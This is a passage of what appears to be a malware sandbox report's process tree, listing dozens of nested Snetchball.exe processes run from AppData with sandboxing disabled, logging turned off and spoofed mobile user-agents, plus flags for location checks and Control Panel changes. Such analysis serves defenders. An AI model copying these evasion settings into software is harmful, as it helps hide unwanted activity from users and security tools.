                                                                            • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                              "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-N975F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.101 Mobile Safari/537.36 OPR/76.2.4027.73374" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3844 --field-trial-handle=2700,i,3474452729815262469,2852195946909066718,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
                                                                              22⤵
                                                                                PID:10520
                                                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-N975F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.101 Mobile Safari/537.36 OPR/76.2.4027.73374" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3800 --field-trial-handle=2700,i,3474452729815262469,2852195946909066718,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
                                                                                22⤵
                                                                                  PID:10572
                                                                                • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-N975F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.101 Mobile Safari/537.36 OPR/76.2.4027.73374" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3892 --field-trial-handle=2700,i,3474452729815262469,2852195946909066718,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
                                                                                  22⤵
                                                                                    PID:10580
                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-N975F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.101 Mobile Safari/537.36 OPR/76.2.4027.73374" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3944 --field-trial-handle=2700,i,3474452729815262469,2852195946909066718,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
                                                                                    22⤵
                                                                                    • Checks computer location settings
                                                                                    PID:10464
                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-N975F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.101 Mobile Safari/537.36 OPR/76.2.4027.73374" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3916 --field-trial-handle=2700,i,3474452729815262469,2852195946909066718,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
                                                                                    22⤵
                                                                                      PID:10484
                                                                                    • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-N975F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.101 Mobile Safari/537.36 OPR/76.2.4027.73374" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3824 --field-trial-handle=2700,i,3474452729815262469,2852195946909066718,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
                                                                                      22⤵
                                                                                      • Checks computer location settings
                                                                                      PID:10128
                                                                                    • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-N975F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.101 Mobile Safari/537.36 OPR/76.2.4027.73374" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5372 --field-trial-handle=2700,i,3474452729815262469,2852195946909066718,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
                                                                                      22⤵
                                                                                      • Checks computer location settings
                                                                                      PID:10768
                                                                                    • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-N975F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.101 Mobile Safari/537.36 OPR/76.2.4027.73374" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=6112 --field-trial-handle=2700,i,3474452729815262469,2852195946909066718,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
                                                                                      22⤵
                                                                                        PID:8872
                                                                                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-N975F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.101 Mobile Safari/537.36 OPR/76.2.4027.73374" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=5292 --field-trial-handle=2700,i,3474452729815262469,2852195946909066718,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
                                                                                        22⤵
                                                                                          PID:3676
                                                                                        • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                          22⤵
                                                                                          • Checks computer location settings
                                                                                          • Modifies Control Panel
                                                                                          PID:5748
                                                                                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 10; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2688 --field-trial-handle=2692,i,13334364974182830309,9180317711647324713,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
                                                                                            23⤵
                                                                                              PID:5656
                                                                                            • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                              "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 10; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2820 --field-trial-handle=2692,i,13334364974182830309,9180317711647324713,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
                                                                                              23⤵
                                                                                                PID:2280
                                                                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 10; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2876 --field-trial-handle=2692,i,13334364974182830309,9180317711647324713,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
                                                                                                23⤵
                                                                                                  PID:652
                                                                                                • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 10; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2992 --field-trial-handle=2692,i,13334364974182830309,9180317711647324713,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
                                                                                                  23⤵
                                                                                                  • Checks computer location settings
                                                                                                  PID:6356
                                                                                                • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 10; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2996 --field-trial-handle=2692,i,13334364974182830309,9180317711647324713,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
                                                                                                  23⤵
                                                                                                  • Checks computer location settings
                                                                                                  PID:6364
                                                                                                • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 10; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=984 --field-trial-handle=2692,i,13334364974182830309,9180317711647324713,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
                                                                                                  23⤵
                                                                                                  • Checks computer location settings
                                                                                                  PID:7156
                                                                                                • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 10; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3596 --field-trial-handle=2692,i,13334364974182830309,9180317711647324713,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
                                                                                                  23⤵
                                                                                                    PID:7128
                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 10; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2288 --field-trial-handle=2692,i,13334364974182830309,9180317711647324713,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
                                                                                                    23⤵
                                                                                                      PID:7164
                                                                                                    • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 10; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3884 --field-trial-handle=2692,i,13334364974182830309,9180317711647324713,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
                                                                                                      23⤵
                                                                                                        PID:6876
                                                                                                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 10; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3900 --field-trial-handle=2692,i,13334364974182830309,9180317711647324713,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
                                                                                                        23⤵
                                                                                                        • Checks computer location settings
                                                                                                        PID:7328
                                                                                                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 10; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3288 --field-trial-handle=2692,i,13334364974182830309,9180317711647324713,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
                                                                                                        23⤵
                                                                                                          PID:7388
                                                                                                        • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                          "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 10; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3888 --field-trial-handle=2692,i,13334364974182830309,9180317711647324713,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
                                                                                                          23⤵
                                                                                                          • Checks computer location settings
                                                                                                          PID:8772
                                                                                                        • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                          "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 10; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3960 --field-trial-handle=2692,i,13334364974182830309,9180317711647324713,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
                                                                                                          23⤵
                                                                                                          • Checks computer location settings
                                                                                                          PID:10192
                                                                                                        • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                          "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 10; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=4816 --field-trial-handle=2692,i,13334364974182830309,9180317711647324713,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
                                                                                                          23⤵
                                                                                                            PID:3400
                                                                                                        • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                          "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                          22⤵
                                                                                                            PID:7960
                                                                                                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                            22⤵
                                                                                                              PID:8120
                                                                                                            • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                              22⤵
                                                                                                                PID:6436
                                                                                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                22⤵
                                                                                                                  PID:6868
                                                                                                                • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                  22⤵
                                                                                                                    PID:7052
                                                                                                                • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                  21⤵
                                                                                                                    PID:3936
                                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                    21⤵
                                                                                                                      PID:4076
                                                                                                                    • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                      "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                      21⤵
                                                                                                                        PID:5192
                                                                                                                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                        21⤵
                                                                                                                          PID:5272
                                                                                                                        • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                          "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                          21⤵
                                                                                                                            PID:5124
                                                                                                                        • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                          "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 16_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3688 --field-trial-handle=2688,i,16965595885439478432,20949363754045926,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
                                                                                                                          20⤵
                                                                                                                          • Checks computer location settings
                                                                                                                          PID:8984
                                                                                                                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                        19⤵
                                                                                                                          PID:648
                                                                                                                        • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                          "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                          19⤵
                                                                                                                            PID:7560
                                                                                                                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                            19⤵
                                                                                                                              PID:6844
                                                                                                                            • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                              "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                              19⤵
                                                                                                                                PID:7248
                                                                                                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                19⤵
                                                                                                                                  PID:6772
                                                                                                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                18⤵
                                                                                                                                  PID:7496
                                                                                                                                • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                  18⤵
                                                                                                                                    PID:8128
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                    18⤵
                                                                                                                                      PID:7392
                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                      18⤵
                                                                                                                                        PID:7052
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                        18⤵
                                                                                                                                          PID:3060
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3488 --field-trial-handle=2680,i,11024065314579049990,18347769865265885283,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
                                                                                                                                        17⤵
                                                                                                                                        • Checks computer location settings
                                                                                                                                        PID:6748
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=1816 --field-trial-handle=2680,i,11024065314579049990,18347769865265885283,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
                                                                                                                                        17⤵
                                                                                                                                        • Checks computer location settings
                                                                                                                                        PID:6824
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3800 --field-trial-handle=2680,i,11024065314579049990,18347769865265885283,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
                                                                                                                                        17⤵
                                                                                                                                          PID:7044
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                        16⤵
                                                                                                                                          PID:5836
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                          16⤵
                                                                                                                                            PID:3320
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                            16⤵
                                                                                                                                              PID:10956
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                              16⤵
